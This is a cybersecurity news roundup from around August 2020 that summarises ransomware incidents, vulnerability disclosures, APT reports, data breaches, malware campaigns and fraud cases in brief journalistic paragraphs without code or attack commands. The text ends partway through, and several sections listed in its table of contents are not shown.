Table of Contents

  1. Ransomware
    1. Ransomware Reportedly Hits Ventilator Maker
    2. Canadian Tire, a well-established retail company based in Canada Got Allegedly Breached by Netwalker
    3. Netwalker Ransomware Operators Allegedly Struck Woodstream
    4. Nefilim Ransomware Operators Allegedly Targeted the SPIE Group, an independent European leader in multi-technical services
    5. Ma Labs Allegedly Breached by REvil Ransomware Operators
    6. Dharma ransomware created a hacking toolkit to make cybercrime easy
    7. Avaddon ransomware launches data leak site to extort victims
    8. Imperial Valley College Hit With Ransomware Attack; Multiple Systems Impacted
    9. Colorado city forced to pay $45,000 ransom to decrypt files
    10. Medical Debt Collection Firm R1 RCM Hit in Ransomware Attack
    11. Over 25% of all UK universities were attacked by ransomware
    12. Catching a Human-Operated Maze Ransomware Attack In Action
  2. Vulnerabilities
    1. Operation PowerFall: Two zero-day vulnerabilities
    2. Call Me Maybe: Eavesdropping Encrypted LTE Calls With ReVoLTE
    3. Microsoft August 2020 Patch Tuesday fixes 2 zero-days, 120 flaws
    4. Windows Print Spooler Patch Bypass Re-Enables Persistent Backdoor
    5. MMS Exploit Part 5: Defeating Android ASLR, Getting RCE
    6. Hunting for SQL injections (SQLis) and Cross-Site Request Forgeries (CSRFs) in WordPress Plugins
    7. Adobe fixes critical code execution bugs in Acrobat and Reader
    8. SAP updates security note for critical RECON vulnerability
    9. Amazon Alexa could be exploited for theft of voice history, PII, skill tampering
    10. Citrix fixes critical bugs allowing takeover of XenMobile Servers
    11. vBulletin fixes ridiculously easy to exploit zero-day RCE bug
    12. Over 400 vulnerabilities on Qualcomm’s Snapdragon chip
  3. APT
    1. CactusPete APT group’s updated Bisonal backdoor
    2. Tor security advisory: exit relays running sslstrip in May and June 2020
    3. FBI and NSA expose new Linux malware Drovorub, used by Russian state hackers
  4. Breaches
    1. Anonymous Germany hacked Sasek sect: training videos show how members are fanatical
    2. Around 570K User Records of Devire Recruitment Agency Leaked on Darkweb for Free
    3. Revealed: 1,400 data breaches at HSE included patient photos and medical files
    4. Maze Reportedly Posts Exfiltrated Canon USA Data
    5. Unsecured Database Exposed on Web - Then Deleted
    6. SANS infosec training org suffers data breach after phishing attack
    7. NCC Group admits its training data was leaked online after folders full of CREST pentest certification exam notes posted to GitHub
    8. The skinny on the Instacart breach
    9. U.S. spirits and wine giant hit by cyberattack, 1TB of data stolen
    10. Hacker leaks data for U.S. gun exchange site on cybercrime forum
    11. Federal Appeals Court Dismisses CareFirst Data Breach Appeal
    12. Argentina exposes COVID-19 health data in error
    13. Michigan State University discloses credit card theft incident
    14. Premier Health Partners Discloses Breach, but No Notifications to Patients Yet
  5. Malware
    1. Mekotio banking trojan imitates update alerts to steal Bitcoin
    2. One of the Most Destructive malware is Spreading Through UNESCO Website
    3. Beware: AgentTesla Infostealer Now More Powerful
    4. For six months, security researchers have secretly distributed an Emotet vaccine across the world
    5. Emotet malware strikes U.S. businesses with COVID-19 spam
    6. PurpleWave—A New Infostealer from Russia
    7. AA20-227A: Phishing Emails Used to Deploy KONNI Malware
    8. Mac malware spreads through Xcode projects, abuses WebKit, Data Vault vulnerabilities
    9. Script-Based Malware: A New Attacker Trend on Internet Explorer
    10. 270 million malware attacks occurred between January and March
  6. Crime
    1. Crooks in Lamborghinis: how cybercriminals continue to exploit US coronavirus relief loans
    2. RedCurl cybercrime group has hacked companies for three years
    3. Malicious Cyber Actor Spoofing COVID-19 Loan Relief Webpage via Phishing Emails
    4. Boomer outsmarts hackers: “Kiss your cash goodbye”
    5. Cyber Adversaries Are Exploiting the Global Pandemic at Enormous Scale
    6. BEC Scam Costs Trading Firm Virtu Financial $6.9 Million
    7. University Investigates Skimming of Credit Card Data
    8. Network intruders selling access to high-value companies
    9. Hackers attack the Bundeswehr fleet service
    10. US Seizes $2 Million in Cryptocurrency From Terrorist Groups
    11. Texas Man Sentenced to 57 Months for Computer Hacking and Aggravated Identity Theft
    12. Phishing Threat Preys on Desperate Business Owners
    13. Phishing Campaign Spoofs SBA Loan Offer
    14. ATM Hackers Have Picked Up Some Clever New Tricks
  7. Privacy
    1. Homeland Security Details New Tools For Extracting Device Data at US Borders
    2. Police Use of Facial Recognition Violates Human Rights, UK Court Rules
    3. TikTok Tracked User Data Using Tactic Banned By Google
    4. TSA considers new system for flyers without ID
    5. Clearview AI landed a new facial recognition contract with ICE
    6. Medical records for more than 61,000 cardiac patients left unsecured online
    7. A simple telephony honeypot received 1.5 million robocalls across 11 months
    8. Leaked Documents Reveal What TikTok Shares with Authorities — in the U.S.
  8. Politics
    1. YouTube Bans Videos Containing Hacked Information That Could Interfere With the Election
    2. Belarus has shut down the internet amid a controversial election
    3. The Clean Network – United States Department of State
  9. Misc
    1. Internet disruption hits Belarus on election day
    2. Mozilla Fires Servo Devs and Security Response Teams
    3. NSA Owns Everything (2015)
    4. FireEye’s bug bounty program goes public
    5. Dutch ISP Ziggo demonstrates how not to inform your customers about a security flaw
    6. Why & Where You Should You Plant Your Flag
    7. Stalkerware Phone Spying Apps Have Escaped Google's Ad Ban
    8. Zoom Sued By Consumer Group For Misrepresenting Its Encryption Protections
    9. Threema joins the ranks of E2EE chat apps that support encrypted video calls
    10. Plymouth Passport Office’s pitiful password privacy
    11. Windows Defender deletes Citrix components mislabeled as malware
    12. Expired certificate led to an undercount of COVID-19 results
    13. Signal adds message requests to stop spam and protect user privacy
    14. Boeing 747s receive software updates over floppy disks

Ransomware

Ransomware Reportedly Hits Ventilator Maker

A manufacturer of transit communication systems that pivoted to build ventilators during the COVID-19 pandemic is reportedly the latest victim of the DoppelPaymer ransomware gang. Boyce Technologies Inc., based in Long Island City, New York, was targeted by the ransomware gang, which has threatened to leak data stolen in the incident unless the company pays a ransom, according to the news site Cointelegraph.

Canadian Tire, a well-established retail company based in Canada Got Allegedly Breached by Netwalker

Recently, the Cyble Research Team came across a leak post in which the Netwalker ransomware operators allegedly breached Canadian Tire and in possession of sensitive data of one of their stores located in Kelowna, Canada.

Netwalker Ransomware Operators Allegedly Struck Woodstream

Recently CybleInc came across a leak post in which the Netwalker ransomware operators claim to have breached the Woodstream Corporation and in possession of the company's sensitive data.

Nefilim Ransomware Operators Allegedly Targeted the SPIE Group, an independent European leader in multi-technical services

The Cyble Research Team came across the post of Nefilim ransomware operators in which they have claimed to have breached The SPIE Group and in possession of the company's sensitive data.

Ma Labs Allegedly Breached by REvil Ransomware Operators

Recently, during the continuous monitoring of deepweb and darkweb, the Cyble Research Team came across a disclosure post in which REvil ransomware operators claimed to have breached Ma Labs -- Founded in 1983 and is one of the leading computer component distributors in the United States. With over 1200 employees the company has been earning annual revenue of around $2 billion.

Dharma ransomware created a hacking toolkit to make cybercrime easy

The Dharma Ransomware-as-a-Service (RaaS) operation makes it easy for a wannabe cyber-criminal to get into the ransomware business by offering a toolkit that does almost everything for them. A RaaS operation is a cybercrime model where the developers are in charge of managing the ransomware development and ransom payment system. At the same time, affiliates are responsible for compromising victims and deploying the ransomware As part of this model, the developers earn between 30-40% of any ransom payments, and the affiliates make the rest. Most of today's enterprise-targeting ransomware groups operate as a private RaaS model, where only the most talented hackers are invited to participate.

Avaddon ransomware launches data leak site to extort victims

Avaddon ransomware is the latest cybercrime operation to launch a data leak site that will be used to publish the stolen data of victims who do not pay a ransom demand. Since the Maze operators began publicly leaking files stolen in ransomware attacks, other operations soon followed suit and began creating data leak sites to publish stolen files. These sites are designed to scare victims into paying a ransomware under threat that their files will be leaked to the public. If publicly released, this data could expose financial information, personal information of employees, and client data, which leads to a data breach. Cybersecurity intelligence firm Kela has told BleepingComputer that the Avaddon ransomware operators have announced on a Russian-speaking hacker forum this weekend that they have launched a new data leak site.

Imperial Valley College Hit With Ransomware Attack; Multiple Systems Impacted

Imperial Valley College releases a brief press statement with some additional information.) A ransomware attack unleashed on Imperial Valley College's computer system on Aug. 6 brought down critical systems that remained offline and will likely continue until further notice, a college spokesperson confirmed.

Colorado city forced to pay $45,000 ransom to decrypt files

A city in Colorado, USA, has been forced to pay $45,000 after the City's devices were encrypted in July, and they were unable to restore necessary files from backup. On July 27th, the City of Lafayette suffered a ransomware attack that impacted their phone services, email, and online payment reservation systems. At the time, the City had not explained what was causing the outage but stated that residents should use 911 or an alternate number for emergency services. Over a week later, the City announced that they were victims of a ransomware attack that encrypted their devices and data, and took down their systems. While financial data was recoverable from backups, after weighing the costs, the City decided to pay a $45,000 ransom to an unknown ransomware operation to receive a decryption tool to recover other encrypted files.

Medical Debt Collection Firm R1 RCM Hit in Ransomware Attack

R1 RCM acknowledged taking down its systems in response to a ransomware attack, but otherwise declined to comment for this story. The "RCM" portion of its name refers to "revenue cycle management," an industry which tracks profits throughout the life cycle of each patient, including patient registration, insurance and benefit verification, medical treatment documentation, and bill preparation and collection from patients. The company has access to a wealth of personal, financial and medical information on tens of millions of patients, including names, dates of birth, Social Security numbers, billing information and medical diagnostic data. It's unclear when the intruders first breached R1's networks, but the ransomware was unleashed more than a week ago, right around the time the company was set to release its 2nd quarter financial results for 2020. R1 RCM declined to discuss the strain of ransomware it is battling or how it was compromised. Sources close to the investigation tell KrebsOnSecurity the malware is known as Defray.*

Over 25% of all UK universities were attacked by ransomware

A third of the universities in the United Kingdom responding to a freedom of information (FOI) request admitted to being a victim of a ransomware attack. These represent more than 25% of the universities and colleges in the country. The incidents occurred in the past decade, most of them between 2015 and 2017. Several educational institutions suffered at least two file-encrypting attacks over the past decade, one of them recording more than 40 since 2013.

Catching a Human-Operated Maze Ransomware Attack In Action

Maze ransomware is one of the most widespread ransomware strains currently in the wild and is distributed by different capable actors. SentinelLabs discovered a Maze affiliate deploying tailor-made persistence methods prior to delivering the ransomware. The actor appears to have used a stolen certificate to sign its Beacon stager. In common with other attacks, the actor used an HTA payload as an interactive shell, which researchers were able to catch live and deobfuscate.

Vulnerabilities

Operation PowerFall: Two zero-day vulnerabilities

Kaspersky has prevented an attack on a South Korean company and discovered two zero-day vulnerabilities in a campaign dubbed campaign Operation PowerFall. They found the first in Internet Explorer 11's JavaScript engine. That one enabled the attackers to remotely execute arbitrary code. The second, detected in an operating system service, let the attackers escalate privileges and perform unauthorized actions.

Call Me Maybe: Eavesdropping Encrypted LTE Calls With ReVoLTE

Voice over LTE (VoLTE) is a packet-based telephony service seamlessly integrated into the Long Term Evolution (LTE) standard. By now all major telecommunication operators use VoLTE. To secure the phone calls, VoLTE encrypts the voice data between the phone and the network with a stream cipher. The stream cipher shall generate a unique keystream for each call to prevent the problem of keystream reuse. Researchers introduced ReVoLTE, an attack that exploits an LTE implementation flaw to recover the contents of an encrypted VoLTE call. This enables an adversary to eavesdrop on VoLTE phone calls. ReVoLTE makes use of a predictable keystream reuse, which was discovered by Raza & Lu. Eventually, the keystream reuse allows an adversary to decrypt a recorded call with minimal resources.

Microsoft August 2020 Patch Tuesday fixes 2 zero-days, 120 flaws

With the release of the August 2020 Patch Tuesday security updates, Microsoft has released one Servicing Stack Update for Windows 10 advisory and fixes for 120 vulnerabilities in Microsoft products. Of these vulnerabilities, 17 are classified as Critical, and 103 are classified as Important. This release is the third-largest Patch Tuesday update ever released by Microsoft, with the second-largest being 123 fixes in July 2020, and the largest being issued in June 2020 with 129 fixes. According to Microsoft, two of the vulnerabilities are actively being used in attacks, with one of them publicly disclosed. The first is "CVE-2020-1380 | Scripting Engine Memory Corruption Vulnerability," a remote code execution vulnerability in Internet Explorer 11 that Boris Larin (Oct0xor) of Kaspersky Lab. The second vulnerability that is actively being used and publicly disclosed is "CVE-2020-1464 | Windows Spoofing Vulnerability" and allows attackers to spoof other companies when digitally signing an executable.

Windows Print Spooler Patch Bypass Re-Enables Persistent Backdoor

In May 2020, Microsoft patched CVE-2020-1048, a critical privilege escalation bug in Windows. Through this vulnerability, an attacker with the ability to execute low-privileged code on a Windows machine can easily establish a persistent backdoor, allowing the attacker to return at any later time and escalate privileges to SYSTEM. The backdoor is "persistent" in the sense that, once established, the backdoor will persist even after a patch for the vulnerability has been applied. CVE-2020-1048 is credited to Peleg Hadar (@peleghd) and Tomer Bar of SafeBreach Labs. It is also described in a highly-detailed Windows Internals blog post by Yarden Shafir & Alex Ionescu, who apparently made an independent discovery of this bug at about the same time as the SafeBreach Labs team. On May 25, 2020, a mere 13 days after the release of the patch for CVE-2020-1048, the ZDI program received a submission from a researcher who goes by the name math1as. In the submission, math1as showed how Microsoft's patch is insufficient to prevent exploitation of the vulnerability. This new flaw was addressed in the August patches as CVE-2020-1337.

MMS Exploit Part 5: Defeating Android ASLR, Getting RCE

This post is the fifth and final of a multi-part series capturing Mateusz Jurczyk's journey from discovering a vulnerable little-known Samsung image codec, to completing a remote zero-click MMS attack that worked on the latest Samsung flagship devices.

Hunting for SQL injections (SQLis) and Cross-Site Request Forgeries (CSRFs) in WordPress Plugins

Researchers from Tenable have written a blog post detailing the finding of 3 reported vulnerabilities in `SRS Simple Hits Counter` and `Email Subscribers & Newsletters` WordPress plugin.

Adobe fixes critical code execution bugs in Acrobat and Reader

Adobe has released security updates for Adobe Acrobat, Reader, and Lightroom that fix a total of twenty-six vulnerabilities in the three programs. Of the vulnerabilities, eleven are classified as 'Critical' because they allow attackers to bypass security features or perform remote code execution on vulnerable computers. Remote code execution vulnerabilities are the most damaging as it allows the attacker to run commands on affected computers without a user's permission or knowledge.

SAP updates security note for critical RECON vulnerability

SAP released its security patches for August, alerting of new critical and high-severity vulnerabilities in several of its products, mostly NetWeaver Application Server (AS). SAP has also updated its security note for the maximum severity RECON vulnerability with a related bug that could enable an unauthenticated attacker to access various folders in the directory structure. The developer also updated the July 2020 Patch Day security note for RECON, a critical issue disclosed by researchers at cybersecurity firm Onapsis, who said that it impacted more than 40,000 SAP customers. Two days after disclosure, proof-of-concept exploit code emerged and researchers recorded active scans for devices vulnerable to RECON.

Amazon Alexa could be exploited for theft of voice history, PII, skill tampering

Check Point Research said on Thursday that the security issues were caused by Amazon Alexa subdomains susceptible to Cross-Origin Resource Sharing (CORS) misconfiguration and cross-site scripting (XSS) attacks. When Check Point first began examining the Alexa mobile app, the company noticed the existence of an SSL mechanism that prevents traffic inspection. However, the script used could be bypassed using the Frida SSL universal unpinning script. This led to the discovery of the app's misconfiguration of CORS policy, which allowed Ajax requests to be sent from Amazon subdomains. If a subdomain was found as vulnerable to code injection, an XSS attack could be launched, and this was performed via track.amazon.com and skillsstore.amazon.com. According to Check Point, it would only take a victim to click on a malicious link to exploit the vulnerabilities. A victim routed to a domain via phishing, for example, could be subject to code injection and the theft of their Amazon-related cookies.

Citrix fixes critical bugs allowing takeover of XenMobile Servers

Citrix fixed 5 vulnerabilities impacting multiple versions of Citrix Endpoint Management (CEM) on-premise instances, also known as XenMobile Server. On-premise Citrix XenMobile provides a unified interface to manage employees' desktops, notebooks, and mobile devices (tablets and smartphones) through a single platform. The company strongly recommends customers to immediately update vulnerable XenMobile Server deployments since attackers will most likely immediately start scanning for vulnerable servers and attempt to exploit them. "We recommend these upgrades be made immediately," Citrix says. "While there are no known exploits as of this writing, we do anticipate malicious actors will move quickly to exploit." "Remediations have already been applied to cloud versions, but hybrid rights users need to apply the upgrades to any on-premises instance."

vBulletin fixes ridiculously easy to exploit zero-day RCE bug

A simple one-line exploit has been published for a zero-day pre-authentication remote code execution (RCE) vulnerability in the vBulletin forum software. vBulletin is an immensely popular online forum software utilized by large brands such as Electronic Arts, Zynga, Sony, Pearl Jam, NASA, Steam, and many more. In September 2019, an unknown security researcher disclosed a zero-day RCE vulnerability in vBulletin's versions 5.0 through 5.4, which was tracked as CVE-2019-16759. Using this vulnerability, attackers could remotely exploit a bug in vBulletin's PHP Module to execute any PHP command on the remote server without logging into the forum.

Over 400 vulnerabilities on Qualcomm’s Snapdragon chip

In this research dubbed "Achilles" CheckPoint performed an extensive security review of a DSP chip from one of the leading manufacturers: Qualcomm Technologies. Qualcomm provides a wide variety of chips that are embedded into devices that make up over 40% of the mobile phone market, including high-end phones from Google, Samsung, LG, Xiaomi, OnePlus and more. More than 400 vulnerable pieces of code were found within the DSP chip.

APT

CactusPete APT group’s updated Bisonal backdoor

Kaspersky spotted CactusPete in February 2020, which is a Chinese-speaking cyber-espionage APT group that uses medium-level technical capabilities, and the people behind it have upped their game. They appear to have received support and have access to more complex code like ShadowPad, which CactusPete deployed in 2020.

Tor security advisory: exit relays running sslstrip in May and June 2020

Tor reports that Tor exit relays have been running sslstrip on outgoing traffic twice earlier this year, and describes what can be done to avoid such attacks. Based on their investigation, Nusenu said the primary goal of these SSL stripping attacks was to allow the group to replace Bitcoin addresses inside HTTP traffic going to Bitcoin mixing services.

FBI and NSA expose new Linux malware Drovorub, used by Russian state hackers

The FBI and NSA have published a joint security alert containing details about a new strain of Linux malware that the two agencies say was developed and deployed in real-world attacks by Russia's military hackers. The two agencies say Russian hackers used the malware, named Drovorub, was to plant backdoors inside hacked networks. Based on the evidence the two agencies have collected, FBI and NSA officials claim the malware is the work of APT28 (Fancy Bear, Sednit), a codename given to the hackers operating out of military unity 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main SpecialService Center (GTsSS). Through their joint alert, the two agencies hope to raise awareness in the US private and public sectors so IT administrators can quickly deploy detection rules and prevention measures.

Breaches

Anonymous Germany hacked Sasek sect: training videos show how members are fanatical

The hacker collective Anonymous has published an internal training videos from the Swiss sect Organische Christus-Generation (OCG). For example, the videos show sect leader Ivo Sasek swearing hundreds of members in a hall with war rhetoric to fight "the elite" and the media. Sentences like:

Around 570K User Records of Devire Recruitment Agency Leaked on Darkweb for Free

The Cyble Research Team identified a threat actor who leaked around 570K records of people looking for jobs from the database of Devire Recruitment agency -- Established in the year 1987, and for more than 30 years we have represented leading employers on the European market by carrying out comprehensive recruitment projects implementing the latest solutions in the area of IT services and helping to build the image of an employer of choice.

Revealed: 1,400 data breaches at HSE included patient photos and medical files

The HSE has suffered almost 1,400 separate data breaches over the past two years involving photographing of patients, infection status being disclosed to other family members, and the discovery of confidential medical files in public places. The number of breaches showed a sharp rise between 2018, when 556 incidents were recorded, and last year when there were 833.

Maze Reportedly Posts Exfiltrated Canon USA Data

The Maze ransomware group has posted on its darknet website some data it claims it stole during a recent attack against Canon USA, according to the security firm Emsisoft. Maze claims to have posted 2.5 GB, or about 5%, of the data it says it exfiltrated from the imaging company during an early August ransomware attack, Brett Callow, an Emsisoft threat analyst, tells Information Security Media Group. A screenshot of the Maze posting shared by Callow shows a ZIP file named StrategicPlanningpart62 as proof Maze had access to Canon's internal data. ISMG is unable to independently verify Maze's claim. No information regarding a ransom demand is mentioned on the gang's website. The company reported on Aug. 4 that a July 30 loss of 10 GB of images from the cloud storage site image.cannon was the result of a technical issue and not a cyber intrusion.

Unsecured Database Exposed on Web - Then Deleted

In a blog Tuesday, independent security researcher Volodymyr "Bob" Diachenko writes of his discovery on July 13 of an unprotected database with information on 3.1 million patients that was exposed to the internet. The database appears to be owned by Adit, a Houston-based online medical appointment and patient management software company.

SANS infosec training org suffers data breach after phishing attack

The SANS cybersecurity training organization has suffered a data breach after one of their employees fell victim to a phishing attack. In a notification posted to their site , SANS states that one of their employees fell for a phishing attack that allowed a threat actor to gain access to their email account.

NCC Group admits its training data was leaked online after folders full of CREST pentest certification exam notes posted to GitHub

British infosec biz NCC Group has admitted to The Register that its internal training materials were leaked on GitHub -- after folders purporting to help people pass the CREST pentest certification exams appeared in a couple of repositories. The documents, posted to the cloudy code shack by an account set up last month, were held in a folder marked "cheatsheets". They appeared to be a collection of exceptionally frank and well informed training materials. The offending repositories have now been removed from GitHub though we understand some forked copies may still exist.

The skinny on the Instacart breach

Instacart, one of the top three brands in the grocery and pick-up services in the world, was recently believed to be hacked, after more than 270,000 accounts of its clients were seen being peddled in the Dark Web. It was reported that these accounts contained information, such as names, addresses, credit card data, and transaction history. BuzzFeed News, who initially reported the incident, have indicated that some affected parties were interviewed and confirmed that, upon being shown data taken from breach, confirmed it was indeed their data being sold. A cybersecurity expert who also looked at some of the data put more weight into its the breach's validity. Days after the report, however, Instacart denied that a security breach happened. "Our teams have been working around the clock to quickly determine the validity of reports related to site security and so far our investigation had shown that the Instacart platform was not compromised or breached," the company wrote in a Medium post.

U.S. spirits and wine giant hit by cyberattack, 1TB of data stolen

Brown-Forman, one of the largest U.S. companies in the spirits and wine business, suffered a cyber attack. The intruders allegedly copied 1TB of confidential data; they plan on selling to the highest bidder the most important info and leak the rest. Sodinokibi (REvil) ransomware operators announced on Friday that they had compromised Brown-Forman's computer network and spent more than a month examining user services, cloud data storage, and general structure. Following the incursion, the attackers claim they stole 1TB of data that includes confidential information about employees, company agreements, contracts, financial statements, and internal correspondence.

Hacker leaks data for U.S. gun exchange site on cybercrime forum

A hacker has released the databases of Utah-based gun exchange, hunting, and kratom sites for free on a cybercrime forum. On August 10th, a threat actor posted databases that they claim contain 195,000 user records for the utahgunexchange.com, 45,000 records for their video site, 15,000 records from the hunting site muleyfreak.com, and 24,000 user records from the Kratom site deepjunglekratom.com.

Federal Appeals Court Dismisses CareFirst Data Breach Appeal

The D.C. Circuit has ruled that it lacks jurisdiction to hear the appeal of CareFirst customers whose data was stolen in a 2014 data breach. The lower court in Attias v. CareFirst dismissed most of the plaintiffs and claims in the case for failure to allege damages and certified the dismissed claims for appeal. The D.C. Circuit determined that some of the claims could not be appealed until the remaining claims were resolved by the lower court, and it was not clear whether the district court judge intended to certify the claims of the dismissed plaintiffs alone. The decision comes over a year after the parties briefed the substantive questions on appeal. EPIC filed an amicus brief that urged the court to impose a duty of reasonable data protection on businesses to ensure that companies protect the personal data they collect. EPIC also filed an amicus brief in the case the last time it was in the D.C. Circuit on a challenge to consumer standing. The D.C. Circuit held that the CareFirst consumers had standing to sue for the data breach.

Argentina exposes COVID-19 health data in error

Argentina's health officials have apparently exposed personal medical data relating to some 115,000 COVID-19 quarantine exemption applicants, in what represents a major health sector data breach.

Michigan State University discloses credit card theft incident

Michigan State University (MSU) disclosed that attackers were able to steal credit card and personal information from roughly 2,600 users of its shop.msu.edu online store. The attackers were able to inject malicious scripts designed to harvest and exfiltrate customers' payment cards after exploiting a now-addressed website vulnerability. Such attacks are known as web skimming attacks (also known as Magecart or e-skimming) and are usually the result of attackers being able to deploy card skimmer scripts on e-commerce sites via compromised admin accounts. An unauthorized party gained access to Michigan State University's online store, shop.msu.edu, and placed malicious code to expose shoppers' credit card numbers between Oct. 19, 2019 and June 26, 2020, MSU said in a statement.

Premier Health Partners Discloses Breach, but No Notifications to Patients Yet

Premier Health Partners ("Premier Health") is providing notice of an incident that may impact the privacy of personal information for certain patients and clients of the Clinical Neuroscience Institute, Help Me Grow Brighter Futures, Samaritan Behavioral Health Inc. (SBHI), and CompuNet Clinical Laboratories. "While we have no evidence of any actual or attempted misuse of information at this time, we take this incident seriously and are providing information about the event, the steps we have taken and are taking in response, and additional precautions individuals may take to protect personal information, should they feel it is appropriate to do so." says the full notice.

Malware

Mekotio banking trojan imitates update alerts to steal Bitcoin

A versatile banking trojan targeting users in Latin America has been circulating in multiple countries including Mexico, Brazil, Chile, Spain, Peru, and Portugal. The malware ensures persistence on infected systems and has advanced capabilities such as planting backdoors, stealing bitcoins, and exfiltrating credentials. Dubbed Mekotio, the trojan collects sensitive information from victim hosts, such as firewall configuration, operating system information, if admin privileges are enabled, and the status of any antivirus products installed.

One of the Most Destructive malware is Spreading Through UNESCO Website

CybleInc researchers came across the E-teams webpage on UNESCO's official website. Multiple click-bait links were posted to lure the visitors into spying onto other accounts. Clicking on these links/posts, the visitor was redirected to a malicious website that requests the visitor for a username or emails to hack and after collecting the information it asks for payment from the visitor to show fake results; It is only to collect bank account details of the visitor.

Beware: AgentTesla Infostealer Now More Powerful

The operators behind the AgentTesla remote access Trojan have upgraded the infostealer with additional capabilities, including the ability to steal credentials from VPNs, web browsers, FTP files and email clients, according to Sentinel Labs. Agent Tesla is a commercially available .Net-based password-stealing Trojan with keylogging capabilities that has been active since at least 2014.

For six months, security researchers have secretly distributed an Emotet vaccine across the world

Most of the time, fighting malware is a losing game. Malware authors create their code, distribute payloads to victims via various methods, and by the time security firms catch up, attackers make small changes in their code to quickly regain their advantage in secrecy. Under the hood, Emotet is just a piece of software - just like everything else (malware = malicious software). As such, Emotet also has bugs. In the cyber-security industry, there's a very dangerous moral line when it comes to exploiting bugs in malware, a line many security companies won't cross, fearing they might end up harming the infected computers by accident. However, a rare bug can sometimes appear that is both safe to exploit and has devastating consequences for the malware itself. One such bug came to light earlier this year, discovered by James Quinn, a malware analyst working for Binary Defense.

Emotet malware strikes U.S. businesses with COVID-19 spam

The Emotet malware has begun to spam COVID-19 related emails to U.S. businesses after not being active for most of the USA pandemic. Before going dark on Feb 7th, 2020, the Emotet malware was commonly spamming COVID-19 themed spam to distribute malware in other countries already affected by the pandemic. As the start of the USA's pandemic was around March, Emotet never had the chance to target U.S. businesses with COVID-19 related spam. With Emotet's back in full swing again after awakening on July 17th, 2020, Emotet has started spewing out COVID-19 spam, and this time it's is now targeting users in the USA.

PurpleWave—A New Infostealer from Russia

Infostealer is one of the most profitable tools for cybercriminals, as information gathered from systems infected with this malware could be sold in the cybercrime underground or used for credential stuffing attacks. The Zscaler ThreatLabZ team came across a new Infostealer called PurpleWave, which is written in C++ and silently installs itself onto a user's system. It connects to a command and control (C&C) server to send system information and installs new malware onto the infected system. The author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.

AA20-227A: Phishing Emails Used to Deploy KONNI Malware

The Cybersecurity and Infrastructure Security Agency (CISA) has observed cyber actors using emails containing a Microsoft Word document with a malicious Visual Basic Application (VBA) macro code to deploy KONNI malware. KONNI is a remote administration tool (RAT) used by malicious cyber actors to steal files, capture keystrokes, take screenshots, and execute arbitrary code on infected hosts. KONNI malware is often delivered via phishing emails as a Microsoft Word document with a malicious VBA macro code. The malicious code can change the font color from light grey to black (to fool the user to enable content), check if the Windows operating system is a 32-bit or 64-bit version, and construct and execute the command line to download additional files.

Mac malware spreads through Xcode projects, abuses WebKit, Data Vault vulnerabilities

The XCSSET malware family has been found in Xcode projects, "lead[ing] to a rabbit hole of malicious payloads," Trend Micro said on Thursday. In a paper exploring the wave of attacks, cybersecurity researchers said an "unusual" infection in a developer's project also included the discovery of two zero-day vulnerabilities. Xcode is a free integrated development environment (IDE) used in macOS for developing Apple-related software and apps. While it is not yet clear how XCSSET worms its way into Xcode projects, Trend Micro says that once embedded, the malware then runs when a project is built.

Script-Based Malware: A New Attacker Trend on Internet Explorer

Unit42 documented script-based malware through Internet Explorer browser exploits that infect Windows Operating System users, using scripting languages such as JScript, VBScript and even AutoIT.

270 million malware attacks occurred between January and March

According to Atlas VPN, 270 million incidents occurred in the first quarter of 2020. The data was gathered from three major cybersecurity firms: WatchGuard, Quick Heal, and Seqrite. While the data does show that the number of detections of malware dropped during March (when 67 million incidents were recorded) compared to January (when 87 million incidents were tracked), the volume is still significant. Those who fell victim to the malware were predominately ordinary home users, who had been forced to adapt to working from home when employers began sending their employees away from offices. Lax security procedures and a lack of good equipment provided a potential goldmine for disreputable hackers to take advantage.

Crime

Crooks in Lamborghinis: how cybercriminals continue to exploit US coronavirus relief loans

A 20-year-old American scammer brags about having made almost a million dollars by stealing from the US funds directed to help small businesses that suffered from COVID-19. "It's an easy option to earn money," he said to CyberNews. Scammers like him continue to exploit business relief funds. Business owners do that as well. They steal enough to buy Lamborghinis.

RedCurl cybercrime group has hacked companies for three years

Security researchers have uncovered a new Russian-speaking hacking group that they claim has been focusing on the past three years on corporate espionage, targeting companies across the world to steal documents that contain commercial secrets and employee personal data. Named RedCurl, the activities of this new group have been detailed in a 57-page report released by cyber-security firm Group-IB.

Malicious Cyber Actor Spoofing COVID-19 Loan Relief Webpage via Phishing Emails

The Cybersecurity and Infrastructure Security Agency (CISA) is currently tracking an unknown malicious cyber actor who is spoofing the Small Business Administration (SBA) COVID-19 loan relief webpage via phishing emails. These emails include a malicious link to the spoofed SBA website that the cyber actor is using for malicious re-directs and credential stealing.

Boomer outsmarts hackers: “Kiss your cash goodbye”

John Richards, the 73-year-old former technician from North Yorkshire, was able to turn the tables on hackers attempting to steal thousands of pounds in a complicated PayPal scam. Instead of falling victim, Richards was able to take the money from the scammer and refuses to give it back. "Don't take friends for fools," Richards told the scammer and kept the money -- £1380 in total. "Kiss good bye to your cash." Richards talked exclusive to CyberNews about the scam that almost cost him. There are thousands of victims like Richards on Facebook. However, while his story turned out well in the end, others have not been so lucky. It's been estimated that the complex PayPal scam steals millions of pounds from victims every single month.

Cyber Adversaries Are Exploiting the Global Pandemic at Enormous Scale

No one could have predicted the degree and magnitude of change we would experience, both within and outside of the cybersecurity industry, in 2020. The first half of the year has demonstrated the dramatic scale at which cybercriminals and nation state actors are willing and able to leverage the global pandemic as an opportunity to launch targeted cyberattacks around the world. They have exploited the fear of individuals and the uncertainties of the pandemic as an attack strategy. And while these attacks cover a spectrum of strategies, they have heavily targeted the sudden expansion of new teleworkers -- literally millions of remote workers expanded the digital attack surface almost overnight -- along with their vulnerable home networks and devices and unprotected browsers.

BEC Scam Costs Trading Firm Virtu Financial $6.9 Million

In its court filing, Virtu Financial reports that an executive's email account was illegally accessed and used to send fraudulent emails to the company's accounting department, resulting in two wire transfers to a bank in China. High-speed trading firm Virtu Financial says it lost $6.9 million in a business email compromise scam in May. The company is now suing its insurer for failure to cover the loss, according to legal documents filed in the case. The company is suing its insurance carrier, Axis Insurance, for not covering the loss, claiming breach of contract.

University Investigates Skimming of Credit Card Data

